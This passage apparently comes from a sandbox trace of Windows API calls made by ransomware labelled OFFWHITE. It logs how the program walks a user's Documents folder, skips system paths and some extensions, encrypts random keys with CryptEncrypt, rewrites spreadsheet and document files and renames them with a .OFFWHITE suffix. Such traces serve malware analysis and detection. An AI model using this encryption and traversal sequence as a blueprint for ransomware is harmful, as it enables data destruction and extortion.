lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.391] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.391] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x121eb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.391] WriteFile (in: hFile=0xb0, lpBuffer=0x53f798*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f798*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0133.392] GetProcessHeap () returned 0x500000 [0133.392] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x11feb) returned 0x55a7b8 [0133.392] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.392] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x11feb, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x11feb, lpOverlapped=0x0) returned 1 [0133.397] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.397] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x11feb, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x11feb, lpOverlapped=0x0) returned 1 [0133.398] GetProcessHeap () returned 0x500000 [0133.398] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0133.398] CloseHandle (hObject=0xb0) returned 1 [0133.400] GetProcessHeap () returned 0x500000 [0133.401] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.401] GetProcessHeap () returned 0x500000 [0133.401] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.401] GetProcessHeap () returned 0x500000 [0133.401] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.401] GetProcessHeap () returned 0x500000 [0133.401] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.401] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jK7JOPKq1fVD16ZSuE70.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jK7JOPKq1fVD16ZSuE70.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jK7JOPKq1fVD16ZSuE70.xlsx" [0133.401] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jK7JOPKq1fVD16ZSuE70.xlsx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jK7JOPKq1fVD16ZSuE70.xlsx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jK7JOPKq1fVD16ZSuE70.xlsx.OFFWHITE" [0133.401] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jK7JOPKq1fVD16ZSuE70.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jk7jopkq1fvd16zsue70.xlsx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jK7JOPKq1fVD16ZSuE70.xlsx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jk7jopkq1fvd16zsue70.xlsx.offwhite")) returned 1 [0133.402] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x897c8f0, ftCreationTime.dwHighDateTime=0x1d58a8b, ftLastAccessTime.dwLowDateTime=0xfeca17d0, ftLastAccessTime.dwHighDateTime=0x1d5c5d9, ftLastWriteTime.dwLowDateTime=0xfeca17d0, ftLastWriteTime.dwHighDateTime=0x1d5c5d9, nFileSizeHigh=0x0, nFileSizeLow=0x13a8e, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="KqQs5jnxQZyyKeS.xlsx", cAlternateFileName="KQQS5J~1.XLS")) returned 1 [0133.402] lstrcmpiW (lpString1="KqQs5jnxQZyyKeS.xlsx", lpString2=".") returned 1 [0133.402] lstrcmpiW (lpString1="KqQs5jnxQZyyKeS.xlsx", lpString2="..") returned 1 [0133.402] lstrcmpiW (lpString1="KqQs5jnxQZyyKeS.xlsx", lpString2="...") returned 1 [0133.402] lstrcmpiW (lpString1="KqQs5jnxQZyyKeS.xlsx", lpString2="windows") returned -1 [0133.402] lstrcmpiW (lpString1="KqQs5jnxQZyyKeS.xlsx", lpString2="$recycle.bin") returned 1 [0133.402] lstrcmpiW (lpString1="KqQs5jnxQZyyKeS.xlsx", lpString2="rsa") returned -1 [0133.402] lstrcmpiW (lpString1="KqQs5jnxQZyyKeS.xlsx", lpString2="ntuser.dat") returned -1 [0133.402] lstrcmpiW (lpString1="KqQs5jnxQZyyKeS.xlsx", lpString2="programdata") returned -1 [0133.402] lstrcmpiW (lpString1="KqQs5jnxQZyyKeS.xlsx", lpString2="appdata") returned 1 [0133.402] lstrcmpiW (lpString1="KqQs5jnxQZyyKeS.xlsx", lpString2="program files") returned -1 [0133.402] lstrcmpiW (lpString1="KqQs5jnxQZyyKeS.xlsx", lpString2="program files (x86)") returned -1 [0133.403] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0133.403] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="KqQs5jnxQZyyKeS.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KqQs5jnxQZyyKeS.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KqQs5jnxQZyyKeS.xlsx" [0133.403] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.403] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.403] PathFindExtensionW (pszPath="KqQs5jnxQZyyKeS.xlsx") returned=".xlsx" [0133.403] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0133.403] lstrcmpiW (lpString1=".xlsx", lpString2=".log") returned 1 [0133.403] lstrcmpiW (lpString1=".xlsx", lpString2=".cab") returned 1 [0133.403] lstrcmpiW (lpString1=".xlsx", lpString2=".cmd") returned 1 [0133.403] lstrcmpiW (lpString1=".xlsx", lpString2=".com") returned 1 [0133.403] lstrcmpiW (lpString1=".xlsx", lpString2=".cpl") returned 1 [0133.403] lstrcmpiW (lpString1=".xlsx", lpString2=".ini") returned 1 [0133.403] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0133.403] lstrcmpiW (lpString1=".xlsx", lpString2=".url") returned 1 [0133.403] lstrcmpiW (lpString1=".xlsx", lpString2=".ttf") returned 1 [0133.403] lstrcmpiW (lpString1=".xlsx", lpString2=".mp3") returned 1 [0133.403] lstrcmpiW (lpString1=".xlsx", lpString2=".pif") returned 1 [0133.403] lstrcmpiW (lpString1=".xlsx", lpString2=".mp4") returned 1 [0133.403] lstrcmpiW (lpString1=".xlsx", lpString2=".OFFWHITE") returned 1 [0133.404] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0133.404] lstrcmpiW (lpString1="KqQs5jnxQZyyKeS.xlsx", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.404] GetProcessHeap () returned 0x500000 [0133.404] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f7a8 [0133.404] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KqQs5jnxQZyyKeS.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kqqs5jnxqzyykes.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0133.404] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=80526) returned 1 [0133.404] GetProcessHeap () returned 0x500000 [0133.404] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.404] GetProcessHeap () returned 0x500000 [0133.405] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.405] GetProcessHeap () returned 0x500000 [0133.405] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.405] GetProcessHeap () returned 0x500000 [0133.405] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.405] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.405] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.405] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.405] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.405] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.405] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.405] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.405] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.405] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0133.405] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.405] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.405] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0133.406] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x13a8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.406] SetLastError (dwErrCode=0x0) [0133.406] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.409] GetLastError () returned 0x0 [0133.409] GetLastError () returned 0x0 [0133.409] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x13b8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.410] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.410] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x13c8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.410] WriteFile (in: hFile=0xb0, lpBuffer=0x53f7a8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f7a8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0133.410] GetProcessHeap () returned 0x500000 [0133.410] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x13a8e) returned 0x55a7b8 [0133.410] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.410] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x13a8e, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x13a8e, lpOverlapped=0x0) returned 1 [0133.418] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.418] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x13a8e, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x13a8e, lpOverlapped=0x0) returned 1 [0133.418] GetProcessHeap () returned 0x500000 [0133.418] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0133.418] CloseHandle (hObject=0xb0) returned 1 [0133.425] GetProcessHeap () returned 0x500000 [0133.425] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.425] GetProcessHeap () returned 0x500000 [0133.425] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.425] GetProcessHeap () returned 0x500000 [0133.425] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.425] GetProcessHeap () returned 0x500000 [0133.425] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.425] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KqQs5jnxQZyyKeS.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KqQs5jnxQZyyKeS.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KqQs5jnxQZyyKeS.xlsx" [0133.425] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KqQs5jnxQZyyKeS.xlsx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KqQs5jnxQZyyKeS.xlsx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KqQs5jnxQZyyKeS.xlsx.OFFWHITE" [0133.425] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KqQs5jnxQZyyKeS.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kqqs5jnxqzyykes.xlsx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KqQs5jnxQZyyKeS.xlsx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kqqs5jnxqzyykes.xlsx.offwhite")) returned 1 [0133.427] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50129150, ftCreationTime.dwHighDateTime=0x1d59e64, ftLastAccessTime.dwLowDateTime=0xc130ed70, ftLastAccessTime.dwHighDateTime=0x1d5912e, ftLastWriteTime.dwLowDateTime=0xc130ed70, ftLastWriteTime.dwHighDateTime=0x1d5912e, nFileSizeHigh=0x0, nFileSizeLow=0xcf95, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="le5oDZK 0ByC1xDR5Xc5.xlsx", cAlternateFileName="LE5ODZ~1.XLS")) returned 1 [0133.427] lstrcmpiW (lpString1="le5oDZK 0ByC1xDR5Xc5.xlsx", lpString2=".") returned 1 [0133.427] lstrcmpiW (lpString1="le5oDZK 0ByC1xDR5Xc5.xlsx", lpString2="..") returned 1 [0133.427] lstrcmpiW (lpString1="le5oDZK 0ByC1xDR5Xc5.xlsx", lpString2="...") returned 1 [0133.427] lstrcmpiW (lpString1="le5oDZK 0ByC1xDR5Xc5.xlsx", lpString2="windows") returned -1 [0133.427] lstrcmpiW (lpString1="le5oDZK 0ByC1xDR5Xc5.xlsx", lpString2="$recycle.bin") returned 1 [0133.427] lstrcmpiW (lpString1="le5oDZK 0ByC1xDR5Xc5.xlsx", lpString2="rsa") returned -1 [0133.427] lstrcmpiW (lpString1="le5oDZK 0ByC1xDR5Xc5.xlsx", lpString2="ntuser.dat") returned -1 [0133.427] lstrcmpiW (lpString1="le5oDZK 0ByC1xDR5Xc5.xlsx", lpString2="programdata") returned -1 [0133.427] lstrcmpiW (lpString1="le5oDZK 0ByC1xDR5Xc5.xlsx", lpString2="appdata") returned 1 [0133.427] lstrcmpiW (lpString1="le5oDZK 0ByC1xDR5Xc5.xlsx", lpString2="program files") returned -1 [0133.427] lstrcmpiW (lpString1="le5oDZK 0ByC1xDR5Xc5.xlsx", lpString2="program files (x86)") returned -1 [0133.427] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0133.427] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="le5oDZK 0ByC1xDR5Xc5.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\le5oDZK 0ByC1xDR5Xc5.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\le5oDZK 0ByC1xDR5Xc5.xlsx" [0133.427] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.427] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.427] PathFindExtensionW (pszPath="le5oDZK 0ByC1xDR5Xc5.xlsx") returned=".xlsx" [0133.427] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0133.428] lstrcmpiW (lpString1=".xlsx", lpString2=".log") returned 1 [0133.428] lstrcmpiW (lpString1=".xlsx", lpString2=".cab") returned 1 [0133.428] lstrcmpiW (lpString1=".xlsx", lpString2=".cmd") returned 1 [0133.428] lstrcmpiW (lpString1=".xlsx", lpString2=".com") returned 1 [0133.428] lstrcmpiW (lpString1=".xlsx", lpString2=".cpl") returned 1 [0133.428] lstrcmpiW (lpString1=".xlsx", lpString2=".ini") returned 1 [0133.428] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0133.428] lstrcmpiW (lpString1=".xlsx", lpString2=".url") returned 1 [0133.428] lstrcmpiW (lpString1=".xlsx", lpString2=".ttf") returned 1 [0133.428] lstrcmpiW (lpString1=".xlsx", lpString2=".mp3") returned 1 [0133.428] lstrcmpiW (lpString1=".xlsx", lpString2=".pif") returned 1 [0133.428] lstrcmpiW (lpString1=".xlsx", lpString2=".mp4") returned 1 [0133.428] lstrcmpiW (lpString1=".xlsx", lpString2=".OFFWHITE") returned 1 [0133.428] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0133.428] lstrcmpiW (lpString1="le5oDZK 0ByC1xDR5Xc5.xlsx", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.428] GetProcessHeap () returned 0x500000 [0133.428] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f7b8 [0133.428] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\le5oDZK 0ByC1xDR5Xc5.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\le5odzk 0byc1xdr5xc5.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0133.429] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=53141) returned 1 [0133.429] GetProcessHeap () returned 0x500000 [0133.429] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.429] GetProcessHeap () returned 0x500000 [0133.429] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.429] GetProcessHeap () returned 0x500000 [0133.429] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.429] GetProcessHeap () returned 0x500000 [0133.429] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.429] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.429] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.429] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.429] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.430] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.430] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.430] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.430] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.430] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0133.430] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.430] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.430] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0133.430] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xcf95, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.430] SetLastError (dwErrCode=0x0) [0133.430] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.432] GetLastError () returned 0x0 [0133.432] GetLastError () returned 0x0 [0133.433] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xd095, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.433] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.433] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xd195, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.433] WriteFile (in: hFile=0xb0, lpBuffer=0x53f7b8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f7b8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0133.433] GetProcessHeap () returned 0x500000 [0133.433] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xcf95) returned 0x55a7b8 [0133.433] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.433] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xcf95, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0xcf95, lpOverlapped=0x0) returned 1 [0133.437] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.437] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xcf95, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0xcf95, lpOverlapped=0x0) returned 1 [0133.438] GetProcessHeap () returned 0x500000 [0133.438] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0133.438] CloseHandle (hObject=0xb0) returned 1 [0133.449] GetProcessHeap () returned 0x500000 [0133.449] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.449] GetProcessHeap () returned 0x500000 [0133.449] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.449] GetProcessHeap () returned 0x500000 [0133.449] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.449] GetProcessHeap () returned 0x500000 [0133.449] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.449] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\le5oDZK 0ByC1xDR5Xc5.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\le5oDZK 0ByC1xDR5Xc5.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\le5oDZK 0ByC1xDR5Xc5.xlsx" [0133.449] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\le5oDZK 0ByC1xDR5Xc5.xlsx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\le5oDZK 0ByC1xDR5Xc5.xlsx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\le5oDZK 0ByC1xDR5Xc5.xlsx.OFFWHITE" [0133.449] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\le5oDZK 0ByC1xDR5Xc5.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\le5odzk 0byc1xdr5xc5.xlsx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\le5oDZK 0ByC1xDR5Xc5.xlsx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\le5odzk 0byc1xdr5xc5.xlsx.offwhite")) returned 1 [0133.687] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a1b830, ftCreationTime.dwHighDateTime=0x1d562d2, ftLastAccessTime.dwLowDateTime=0x8a3f1db0, ftLastAccessTime.dwHighDateTime=0x1d59c95, ftLastWriteTime.dwLowDateTime=0x8a3f1db0, ftLastWriteTime.dwHighDateTime=0x1d59c95, nFileSizeHigh=0x0, nFileSizeLow=0x18901, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="lohmqPwxW5c2V6W9W.docx", cAlternateFileName="LOHMQP~1.DOC")) returned 1 [0133.687] lstrcmpiW (lpString1="lohmqPwxW5c2V6W9W.docx", lpString2=".") returned 1 [0133.687] lstrcmpiW (lpString1="lohmqPwxW5c2V6W9W.docx", lpString2="..") returned 1 [0133.687] lstrcmpiW (lpString1="lohmqPwxW5c2V6W9W.docx", lpString2="...") returned 1 